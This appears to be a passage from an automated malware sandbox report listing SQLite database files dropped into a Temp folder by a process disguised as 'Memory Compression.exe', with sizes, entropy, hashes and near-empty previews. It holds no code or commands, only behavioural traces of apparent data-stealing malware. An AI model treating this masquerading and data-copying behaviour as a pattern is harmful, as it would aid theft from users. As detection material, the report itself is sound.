                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\KmMDjSYvay

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\KmzRcRM6PL

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\LHjOY8KskQ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\LwSm6YdwJP

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\LyKXxpkgnm

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\M3MKfjiTDt

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\MBV635GB57

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\NDMXpsekSL

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\NOJqsnPIpH

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\NT573ZnqI6

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\NawOnbzghD

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Ne1rSzJpIP

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\NfgawjfjZh

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\O81p5mgbbv

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\OCDRXxbZNs

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\OK7j1PdUxJ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\OMtD15XNm3

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\OSA6EmJ2Hd

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\OhKSbDJfIh

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\OhP4hXfkTV

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\OkXfZy2zKB

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\OoXW3tQHUz

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
